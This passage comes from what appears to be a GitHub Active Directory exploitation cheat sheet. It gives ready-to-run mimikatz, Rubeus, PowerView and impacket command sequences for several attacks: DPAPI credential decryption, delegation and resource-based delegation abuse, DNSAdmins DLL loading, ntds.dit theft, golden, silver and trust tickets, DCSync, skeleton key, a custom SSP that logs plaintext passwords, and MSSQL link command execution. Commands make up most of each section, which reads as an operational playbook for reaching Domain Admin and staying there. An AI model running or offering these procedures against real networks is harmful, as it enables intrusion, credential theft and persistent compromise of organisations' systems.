799 | dpapi::cred /in:"%appdata%\Microsoft\Credentials\"
800 |
801 | #From the previous command we are interested to the "guidMasterKey" parameter, that tells us which masterkey was used to encrypt the credential
802 | #Lets enumerate the Master Key:
803 | dpapi::masterkey /in:"%appdata%\Microsoft\Protect\\"
804 |
805 | #Now if we are on the context of the user (or system) that the credential belogs to, we can use the /rpc flag to pass the decryption of the masterkey to the domain controler:
806 | dpapi::masterkey /in:"%appdata%\Microsoft\Protect\\" /rpc
807 |
808 | #We now have the masterkey in our local cache:
809 | dpapi::cache
810 |
811 | #Finally we can decrypt the credential using the cached masterkey:
812 | dpapi::cred /in:"%appdata%\Microsoft\Credentials\"
813 | ```
814 |
815 | Detailed Article:
816 | [DPAPI all the things](https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials)
817 |
818 | ### Unconstrained Delegation
819 |
820 | _WUT IS DIS ?: If we have Administrative access on a machine that has Unconstrained Delegation enabled, we can wait for a
821 | high value target or DA to connect to it, steal his TGT then ptt and impersonate him!_
822 |
823 | Using PowerView:
824 |
825 | ```powershell
826 | #Discover domain joined computers that have Unconstrained Delegation enabled
827 | Get-NetComputer -UnConstrained
828 |
829 | #List tickets and check if a DA or some High Value target has stored its TGT
830 | Invoke-Mimikatz -Command '"sekurlsa::tickets"'
831 |
832 | #Command to monitor any incoming sessions on our compromised server
833 | Invoke-UserHunter -ComputerName -Poll -UserName -Delay
834 | -Verbose
835 |
836 | #Dump the tickets to disk:
837 | Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
838 |
839 | #Impersonate the user using ptt attack:
840 | Invoke-Mimikatz -Command '"kerberos::ptt "'
841 | ```
842 |
843 | **Note:** We can also use Rubeus!
844 |
845 | ### Constrained Delegation
846 |
847 | Using PowerView and Kekeo:
848 |
849 | ```powershell
850 | #Enumerate Users and Computers with constrained delegation
851 | Get-DomainUser -TrustedToAuth
852 | Get-DomainComputer -TrustedToAuth
853 |
854 | #If we have a user that has Constrained delegation, we ask for a valid tgt of this user using kekeo
855 | tgt::ask /user: /domain: /rc4:
856 |
857 | #Then using the TGT we have ask a TGS for a Service this user has Access to through constrained delegation
858 | tgs::s4u /tgt: /user:@ /service:
859 |
860 | #Finally use mimikatz to ptt the TGS
861 | Invoke-Mimikatz -Command '"kerberos::ptt "'
862 | ```
863 |
864 | _ALTERNATIVE:_
865 | Using Rubeus:
866 |
867 | ```powershell
868 | Rubeus.exe s4u /user: /rc4: /impersonateuser: /msdsspn:"" /altservice: /ptt
869 | ```
870 |
871 | Now we can access the service as the impersonated user!
872 |
873 | :triangular_flag_on_post: **What if we have delegation rights for only a specific SPN? (e.g TIME):**
874 |
875 | In this case we can still abuse a feature of kerberos called "alternative service". This allows us to request TGS tickets for other "alternative" services and not only for the one we have rights for. Thats gives us the leverage to request valid tickets for any service we want that the host supports, giving us full access over the target machine.
876 |
877 | ### Resource Based Constrained Delegation
878 |
879 | _WUT IS DIS?: \
880 | TL;DR \
881 | If we have GenericALL/GenericWrite privileges on a machine account object of a domain, we can abuse it and impersonate ourselves as any user of the domain to it. For example we can impersonate Domain Administrator and have complete access._
882 |
883 | Tools we are going to use:
884 |
885 | - [PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/dev/Recon)
886 | - [Powermad](https://github.com/Kevin-Robertson/Powermad)
887 | - [Rubeus](https://github.com/GhostPack/Rubeus)
888 |
889 | First we need to enter the security context of the user/machine account that has the privileges over the object.
890 | If it is a user account we can use Pass the Hash, RDP, PSCredentials etc.
891 |
892 | Exploitation Example:
893 |
894 | ```powershell
895 | #Import Powermad and use it to create a new MACHINE ACCOUNT
896 | . .\Powermad.ps1
897 | New-MachineAccount -MachineAccount -Password $(ConvertTo-SecureString 'p@ssword!' -AsPlainText -Force) -Verbose
898 |
899 | #Import PowerView and get the SID of our new created machine account
900 | . .\PowerView.ps1
901 | $ComputerSid = Get-DomainComputer -Properties objectsid | Select -Expand objectsid
902 |
903 | #Then by using the SID we are going to build an ACE for the new created machine account using a raw security descriptor:
904 | $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
905 | $SDBytes = New-Object byte[] ($SD.BinaryLength)
906 | $SD.GetBinaryForm($SDBytes, 0)
907 |
908 | #Next, we need to set the security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we're taking over, again using PowerView
909 | Get-DomainComputer TargetMachine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
910 |
911 | #After that we need to get the RC4 hash of the new machine account's password using Rubeus
912 | Rubeus.exe hash /password:'p@ssword!'
913 |
914 | #And for this example, we are going to impersonate Domain Administrator on the cifs service of the target computer using Rubeus
915 | Rubeus.exe s4u /user: /rc4: /impersonateuser:Administrator /msdsspn:cifs/TargetMachine.wtver.domain /domain:wtver.domain /ptt
916 |
917 | #Finally we can access the C$ drive of the target machine
918 | dir \\TargetMachine.wtver.domain\C$
919 | ```
920 |
921 | Detailed Articles:
922 |
923 | - [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)
924 | - [RESOURCE-BASED CONSTRAINED DELEGATION ABUSE](https://blog.stealthbits.com/resource-based-constrained-delegation-abuse/)
925 |
926 | :exclamation: In Constrain and Resource-Based Constrained Delegation if we don't have the password/hash of the account with TRUSTED_TO_AUTH_FOR_DELEGATION that we try to abuse, we can use the very nice trick "tgt::deleg" from kekeo or "tgtdeleg" from rubeus and fool Kerberos to give us a valid TGT for that account. Then we just use the ticket instead of the hash of the account to perform the attack.
927 |
928 | ```powershell
929 | #Command on Rubeus
930 | Rubeus.exe tgtdeleg /nowrap
931 | ```
932 |
933 | Detailed Article:
934 | [Rubeus – Now With More Kekeo](https://www.harmj0y.net/blog/redteaming/rubeus-now-with-more-kekeo/)
935 |
936 | ### DNSAdmins Abuse
937 |
938 | _WUT IS DIS ?: If a user is a member of the DNSAdmins group, he can possibly load an arbitary DLL with the privileges of dns.exe that runs as SYSTEM. In case the DC serves a DNS, the user can escalate his privileges to DA. This exploitation process needs privileges to restart the DNS service to work._
939 |
940 | 1. Enumerate the members of the DNSAdmins group:
941 | - PowerView: `Get-NetGroupMember -GroupName "DNSAdmins"`
942 | - AD Module: `Get-ADGroupMember -Identiny DNSAdmins`
943 | 2. Once we found a member of this group we need to compromise it (There are many ways).
944 | 3. Then by serving a malicious DLL on a SMB share and configuring the dll usage,we can escalate our privileges:
945 |
946 | ```powershell
947 | #Using dnscmd:
948 | dnscmd /config /serverlevelplugindll \\Path\To\Our\Dll\malicious.dll
949 |
950 | #Restart the DNS Service:
951 | sc \\DNSServer stop dns
952 | sc \\DNSServer start dns
953 | ```
954 |
955 | ### Abusing Active Directory-Integraded DNS
956 |
957 | - [Exploiting Active Directory-Integrated DNS](https://blog.netspi.com/exploiting-adidns/)
958 | - [ADIDNS Revisited](https://blog.netspi.com/adidns-revisited/)
959 | - [Inveigh](https://github.com/Kevin-Robertson/Inveigh)
960 |
961 | ### Abusing Backup Operators Group
962 |
963 | _WUT IS DIS ?: If we manage to compromise a user account that is member of the Backup Operators
964 | group, we can then abuse it's SeBackupPrivilege to create a shadow copy of the current state of the DC,
965 | extract the ntds.dit database file, dump the hashes and escalate our privileges to DA._
966 |
967 | 1. Once we have access on an account that has the SeBackupPrivilege we can access the DC and create a shadow copy using the signed binary diskshadow:
968 |
969 | ```powershell
970 | #Create a .txt file that will contain the shadow copy process script
971 | Script ->{
972 | set context persistent nowriters
973 | set metadata c:\windows\system32\spool\drivers\color\example.cab
974 | set verbose on
975 | begin backup
976 | add volume c: alias mydrive
977 |
978 | create
979 |
980 | expose %mydrive% w:
981 | end backup
982 | }
983 |
984 | #Execute diskshadow with our script as parameter
985 | diskshadow /s script.txt
986 | ```
987 |
988 | 2. Next we need to access the shadow copy, we may have the SeBackupPrivilege but we cant just
989 | simply copy-paste ntds.dit, we need to mimic a backup software and use Win32 API calls to copy it on an accessible folder. For this we are
990 | going to use [this](https://github.com/giuliano108/SeBackupPrivilege) amazing repo:
991 |
992 | ```powershell
993 | #Importing both dlls from the repo using powershell
994 | Import-Module .\SeBackupPrivilegeCmdLets.dll
995 | Import-Module .\SeBackupPrivilegeUtils.dll
996 |
997 | #Checking if the SeBackupPrivilege is enabled
998 | Get-SeBackupPrivilege
999 |
1000 | #If it isn't we enable it
1001 | Set-SeBackupPrivilege
1002 |
1003 | #Use the functionality of the dlls to copy the ntds.dit database file from the shadow copy to a location of our choice
1004 | Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\\ntds.dit -Overwrite
1005 |
1006 | #Dump the SYSTEM hive
1007 | reg save HKLM\SYSTEM c:\temp\system.hive
1008 | ```
1009 |
1010 | 3. Using smbclient.py from impacket or some other tool we copy ntds.dit and the SYSTEM hive on our local machine.
1011 | 4. Use secretsdump.py from impacket and dump the hashes.
1012 | 5. Use psexec or another tool of your choice to PTH and get Domain Admin access.
1013 |
1014 | ### Abusing Exchange
1015 |
1016 | - [Abusing Exchange one Api call from DA](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/)
1017 | - [CVE-2020-0688](https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys)
1018 | - [PrivExchange](https://github.com/dirkjanm/PrivExchange) Exchange your privileges for Domain Admin privs by abusing Exchange
1019 |
1020 | ### Weaponizing Printer Bug
1021 |
1022 | - [Printer Server Bug to Domain Administrator](https://www.dionach.com/blog/printer-server-bug-to-domain-administrator/)
1023 | - [NetNTLMtoSilverTicket](https://github.com/NotMedic/NetNTLMtoSilverTicket)
1024 |
1025 | ### Abusing ACLs
1026 |
1027 | - [Escalating privileges with ACLs in Active Directory](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
1028 | - [aclpwn.py](https://github.com/fox-it/aclpwn.py)
1029 | - [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn)
1030 |
1031 | ### Abusing IPv6 with mitm6
1032 |
1033 | - [Compromising IPv4 networks via IPv6](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/)
1034 | - [mitm6](https://github.com/fox-it/mitm6)
1035 |
1036 | ### SID History Abuse
1037 |
1038 | _WUT IS DIS?: If we manage to compromise a child domain of a forest and [SID filtering](https://www.itprotoday.com/windows-8/sid-filtering) isn't enabled (most of the times is not), we can abuse it to privilege escalate to Domain Administrator of the root domain of the forest. This is possible because of the [SID History](https://www.itprotoday.com/windows-8/sid-history) field on a kerberos TGT ticket, that defines the "extra" security groups and privileges._
1039 |
1040 | Exploitation example:
1041 |
1042 | ```powershell
1043 | #Get the SID of the Current Domain using PowerView
1044 | Get-DomainSID -Domain current.root.domain.local
1045 |
1046 | #Get the SID of the Root Domain using PowerView
1047 | Get-DomainSID -Domain root.domain.local
1048 |
1049 | #Create the Enteprise Admins SID
1050 | Format: RootDomainSID-519
1051 |
1052 | #Forge "Extra" Golden Ticket using mimikatz
1053 | kerberos::golden /user:Administrator /domain:current.root.domain.local /sid: /krbtgt: /sids: /startoffset:0 /endin:600 /renewmax:10080 /ticket:\path\to\ticket\golden.kirbi
1054 |
1055 | #Inject the ticket into memory
1056 | kerberos::ptt \path\to\ticket\golden.kirbi
1057 |
1058 | #List the DC of the Root Domain
1059 | dir \\dc.root.domain.local\C$
1060 |
1061 | #Or DCsync and dump the hashes using mimikatz
1062 | lsadump::dcsync /domain:root.domain.local /all
1063 | ```
1064 |
1065 | Detailed Articles:
1066 |
1067 | - [Kerberos Golden Tickets are Now More Golden](https://adsecurity.org/?p=1640)
1068 | - [A Guide to Attacking Domain Trusts](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/)
1069 |
1070 | ### Exploiting SharePoint
1071 |
1072 | - [CVE-2019-0604](https://medium.com/@gorkemkaradeniz/sharepoint-cve-2019-0604-rce-exploitation-ab3056623b7d) RCE Exploitation \
1073 | [PoC](https://github.com/k8gege/CVE-2019-0604)
1074 | - [CVE-2019-1257](https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization) Code execution through BDC deserialization
1075 | - [CVE-2020-0932](https://www.zerodayinitiative.com/blog/2020/4/28/cve-2020-0932-remote-code-execution-on-microsoft-sharepoint-using-typeconverters) RCE using typeconverters \
1076 | [PoC](https://github.com/thezdi/PoC/tree/master/CVE-2020-0932)
1077 |
1078 | ### Zerologon
1079 |
1080 | - [Zerologon: Unauthenticated domain controller compromise](https://www.secura.com/whitepapers/zerologon-whitepaper): White paper of the vulnerability.
1081 | - [SharpZeroLogon](https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon): C# implementation of the Zerologon exploit.
1082 | - [Invoke-ZeroLogon](https://github.com/BC-SECURITY/Invoke-ZeroLogon): PowerShell implementation of the Zerologon exploit.
1083 | - [Zer0Dump](https://github.com/bb00/zer0dump): Python implementation of the Zerologon exploit using the impacket library.
1084 |
1085 | ### PrintNightmare
1086 |
1087 | - [CVE-2021-34527](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527): Vulnerability details.
1088 | - [Impacket implementation of PrintNightmare](https://github.com/cube0x0/CVE-2021-1675): Reliable PoC of PrintNightmare using the impacket library.
1089 | - [C# Implementation of CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare): Reliable PoC of PrintNightmare written in C#.
1090 |
1091 | ### Active Directory Certificate Services
1092 |
1093 | **Check for Vulnerable Certificate Templates with:** [Certify](https://github.com/GhostPack/Certify)
1094 |
1095 | _Note: Certify can be executed with Cobalt Strike's `execute-assembly` command as well_
1096 |
1097 | ```powershell
1098 | .\Certify.exe find /vulnerable /quiet
1099 | ```
1100 |
1101 | Make sure the msPKI-Certificates-Name-Flag value is set to "ENROLLEE_SUPPLIES_SUBJECT" and that the Enrollment Rights
1102 | allow Domain/Authenticated Users. Additionally, check that the pkiextendedkeyusage parameter contains the "Client Authentication" value as well as that the "Authorized Signatures Required" parameter is set to 0.
1103 |
1104 | This exploit only works because these settings enable server/client authentication, meaning an attacker can specify the UPN of a Domain Admin ("DA")
1105 | and use the captured certificate with Rubeus to forge authentication.
1106 |
1107 | _Note: If a Domain Admin is in a Protected Users group, the exploit may not work as intended. Check before choosing a DA to target._
1108 |
1109 | Request the DA's Account Certificate with Certify
1110 |
1111 | ```powershell
1112 | .\Certify.exe request /template: /quiet /ca:"" /domain: /path:CN=Configuration,DC=,DC=com /altname: /machine
1113 | ```
1114 |
1115 | This should return a valid certificate for the associated DA account.
1116 |
1117 | The exported `cert.pem` and `cert.key` files must be consolidated into a single `cert.pem` file, with one gap of whitespace between the `END RSA PRIVATE KEY` and the `BEGIN CERTIFICATE`.
1118 |
1119 | _Example of `cert.pem`:_
1120 |
1121 | ```
1122 | -----BEGIN RSA PRIVATE KEY-----
1123 | BIIEogIBAAk15x0ID[...]
1124 | [...]
1125 | [...]
1126 | -----END RSA PRIVATE KEY-----
1127 |
1128 | -----BEGIN CERTIFICATE-----
1129 | BIIEogIBOmgAwIbSe[...]
1130 | [...]
1131 | [...]
1132 | -----END CERTIFICATE-----
1133 | ```
1134 |
1135 | #Utilize `openssl` to Convert to PKCS #12 Format
1136 |
1137 | The `openssl` command can be utilized to convert the certificate file into PKCS #12 format (you may be required to enter an export password, which can be anything you like).
1138 |
1139 | ```bash
1140 | openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
1141 | ```
1142 |
1143 | Once the `cert.pfx` file has been exported, upload it to the compromised host (this can be done in a variety of ways, such as with Powershell, SMB, `certutil.exe`, Cobalt Strike's upload functionality, etc.)
1144 |
1145 | After the `cert.pfx` file has been uploaded to the compromised host, [Rubeus](https://github.com/GhostPack/Rubeus) can be used to request a Kerberos TGT for the DA account which will then be imported into memory.
1146 |
1147 | ```powershell
1148 | .\Rubeus.exe asktht /user: /domain: /dc: /certificate: /nowrap /ptt
1149 | ```
1150 |
1151 | This should result in a successfully imported ticket, which then enables an attacker to perform various malicious acitivities under DA user context, such as performing a DCSync attack.
1152 |
1153 | ### No PAC
1154 |
1155 | - [sAMAccountname Spoofing](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) Exploitation of CVE-2021-42278 and CVE-2021-42287
1156 | - [Weaponisation of CVE-2021-42287/CVE-2021-42278](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) Exploitation of CVE-2021-42278 and CVE-2021-42287
1157 | - [noPAC](https://github.com/cube0x0/noPac) C# tool to exploit CVE-2021-42278 and CVE-2021-42287
1158 | - [sam-the-admin](https://github.com/WazeHell/sam-the-admin) Python automated tool to exploit CVE-2021-42278 and CVE-2021-42287
1159 | - [noPac](https://github.com/Ridter/noPac) Evolution of "sam-the-admin" tool
1160 |
1161 | ## Domain Persistence
1162 |
1163 | ### Golden Ticket Attack
1164 |
1165 | ```powershell
1166 | #Execute mimikatz on DC as DA to grab krbtgt hash:
1167 | Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName
1168 |
1169 | #On any machine:
1170 | Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid: /krbtgt:
1171 | id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
1172 | ```
1173 |
1174 | ### DCsync Attack
1175 |
1176 | ```powershell
1177 | #DCsync using mimikatz (You need DA rights or DS-Replication-Get-Changes and DS-Replication-Get-Changes-All privileges):
1178 | Invoke-Mimikatz -Command '"lsadump::dcsync /user:\"'
1179 |
1180 | #DCsync using secretsdump.py from impacket with NTLM authentication
1181 | secretsdump.py /:@ -just-dc-ntlm
1182 |
1183 | #DCsync using secretsdump.py from impacket with Kerberos Authentication
1184 | secretsdump.py -no-pass -k /@ -just-dc-ntlm
1185 | ```
1186 |
1187 | **Tip:** \
1188 | /ptt -> inject ticket on current running session \
1189 | /ticket -> save the ticket on the system for later use
1190 |
1191 | ### Silver Ticket Attack
1192 |
1193 | ```powershell
1194 | Invoke-Mimikatz -Command '"kerberos::golden /domain: /sid: /target: /service:
1195 | /rc4: /user: /ptt"'
1196 | ```
1197 |
1198 | [SPN List](https://adsecurity.org/?page_id=183)
1199 |
1200 | ### Skeleton Key Attack
1201 |
1202 | ```powershell
1203 | #Exploitation Command runned as DA:
1204 | Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName
1205 |
1206 | #Access using the password "mimikatz"
1207 | Enter-PSSession -ComputerName -Credential \Administrator
1208 | ```
1209 |
1210 | ### DSRM Abuse
1211 |
1212 | _WUT IS DIS?: Every DC has a local Administrator account, this accounts has the DSRM password which is a SafeBackupPassword. We can get this and then pth its NTLM hash to get local Administrator access to DC!_
1213 |
1214 | ```powershell
1215 | #Dump DSRM password (needs DA privs):
1216 | Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName
1217 |
1218 | #This is a local account, so we can PTH and authenticate!
1219 | #BUT we need to alter the behaviour of the DSRM account before pth:
1220 | #Connect on DC:
1221 | Enter-PSSession -ComputerName
1222 |
1223 | #Alter the Logon behaviour on registry:
1224 | New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose
1225 |
1226 | #If the property already exists:
1227 | Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose
1228 | ```
1229 |
1230 | Then just PTH to get local admin access on DC!
1231 |
1232 | ### Custom SSP
1233 |
1234 | _WUT IS DIS?: We can set our on SSP by dropping a custom dll, for example mimilib.dll from mimikatz, that will monitor and capture plaintext passwords from users that logged on!_
1235 |
1236 | From powershell:
1237 |
1238 | ```powershell
1239 | #Get current Security Package:
1240 | $packages = Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
1241 |
1242 | #Append mimilib:
1243 | $packages += "mimilib"
1244 |
1245 | #Change the new packages name
1246 | Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig\" -Name 'Security Packages' -Value $packages
1247 | Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name 'Security Packages' -Value $packages
1248 |
1249 | #ALTERNATIVE:
1250 | Invoke-Mimikatz -Command '"misc::memssp"'
1251 | ```
1252 |
1253 | Now all logons on the DC are logged to -> C:\Windows\System32\kiwissp.log
1254 |
1255 | ## Cross Forest Attacks
1256 |
1257 | ### Trust Tickets
1258 |
1259 | _WUT IS DIS ?: If we have Domain Admin rights on a Domain that has Bidirectional Trust relationship with an other forest we can get the Trust key and forge our own inter-realm TGT._
1260 |
1261 | :warning: The access we will have will be limited to what our DA account is configured to have on the other Forest!
1262 |
1263 | - Using Mimikatz:
1264 |
1265 | ```powershell
1266 | #Dump the trust key
1267 | Invoke-Mimikatz -Command '"lsadump::trust /patch"'
1268 | Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
1269 |
1270 | #Forge an inter-realm TGT using the Golden Ticket attack
1271 | Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid:
1272 | /rc4: /service:krbtgt /target: /ticket:
1273 | "'
1274 | ```
1275 |
1276 | :exclamation: Tickets -> .kirbi format
1277 |
1278 | Then Ask for a TGS to the external Forest for any service using the inter-realm TGT and access the resource!
1279 |
1280 | - Using Rubeus:
1281 |
1282 | ```powershell
1283 | .\Rubeus.exe asktgs /ticket: /service:"Service's SPN" /ptt
1284 | ```
1285 |
1286 | ### Abuse MSSQL Servers
1287 |
1288 | - Enumerate MSSQL Instances: `Get-SQLInstanceDomain`
1289 | - Check Accessibility as current user:
1290 |
1291 | ```powershell
1292 | Get-SQLConnectionTestThreaded
1293 | Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
1294 | ```
1295 |
1296 | - Gather Information about the instance: `Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose`
1297 | - Abusing SQL Database Links: \
1298 | _WUT IS DIS?: A database link allows a SQL Server to access other resources like other SQL Server. If we have two linked SQL Servers we can execute stored procedures in them. Database links also works across Forest Trust!_
1299 |
1300 | Check for existing Database Links:
1301 |
1302 | ```powershell
1303 | #Check for existing Database Links:
1304 | #PowerUpSQL:
1305 | Get-SQLServerLink -Instance -Verbose
1306 |
1307 | #MSSQL Query:
1308 | select * from master..sysservers
1309 | ```
1310 |
1311 | Then we can use queries to enumerate other links from the linked Database:
1312 |
1313 | ```powershell
1314 | #Manualy:
1315 | select * from openquery("LinkedDatabase", 'select * from master..sysservers')
1316 |
1317 | #PowerUpSQL (Will Enum every link across Forests and Child Domain of the Forests):
1318 | Get-SQLServerLinkCrawl -Instance -Verbose
1319 |
1320 | # Enable RPC Out (Required to Execute XP_CMDSHELL)
1321 | EXEC sp_serveroption 'sqllinked-hostname', 'rpc', 'true';
1322 | EXEC sp_serveroption 'sqllinked-hostname', 'rpc out', 'true';
1323 | select * from openquery("SQL03", 'EXEC sp_serveroption ''SQL03'',''rpc'',''true'';');
1324 | select * from openquery("SQL03", 'EXEC sp_serveroption ''SQL03'',''rpc out'',''true'';');
1325 |
1326 | #Then we can execute command on the machine's were the SQL Service runs using xp_cmdshell
1327 | #Or if it is disabled enable it:
1328 | EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "SPN"
1329 | ```
1330 |
1331 | Query execution:
1332 |
1333 | ```powershell
1334 | Get-SQLServerLinkCrawl -Instace -Query "exec master..xp_cmdshell 'whoami'"
1335 | ```
1336 |
1337 | ### Breaking Forest Trusts
1338 |
1339 | _WUT IS DIS?: \
1340 | TL;DR \
1341 | If we have a bidirectional trust with an external forest and we manage to compromise a machine on the local forest that has enabled unconstrained delegation (DCs have this by default), we can use the printerbug to force the DC of the external forest's root domain to authenticate to us. Then we can capture it's TGT, inject it into memory and DCsync to dump it's hashes, giving ous complete access over the whole forest._
1342 |
1343 | Tools we are going to use:
1344 |
1345 | - [Rubeus](https://github.com/GhostPack/Rubeus)
1346 | - [SpoolSample](https://github.com/leechristensen/SpoolSample)
1347 | - [Mimikatz](https://github.com/gentilkiwi/mimikatz)
1348 |
1349 | Exploitation example:
1350 |
1351 | ```powershell
1352 | #Start monitoring for TGTs with rubeus:
1353 | Rubeus.exe monitor /interval:5 /filteruser:target-dc
1354 |
1355 | #Execute the printerbug to trigger the force authentication of the target DC to our machine
1356 | SpoolSample.exe target-dc.external.forest.local dc.compromised.domain.local
1357 |
1358 | #Get the base64 captured TGT from Rubeus and inject it into memory:
1359 | Rubeus.exe ptt /ticket:
1360 |
1361 | #Dump the hashes of the target domain using mimikatz:
1362 | lsadump::dcsync /domain:external.forest.local /all
1363 | ```
1364 |
1365 | Detailed Articles:
1366 |
1367 | - [Not A Security Boundary: Breaking Forest Trusts](https://blog.harmj0y.net/redteaming/not-a-security-boundary-breaking-forest-trusts/)
1368 | - [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)
1369 |
--------------------------------------------------------------------------------
/WalkTheDog.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet/8f1f69be90677e3b00fd3355c2c9cb821f715f04/WalkTheDog.png
--------------------------------------------------------------------------------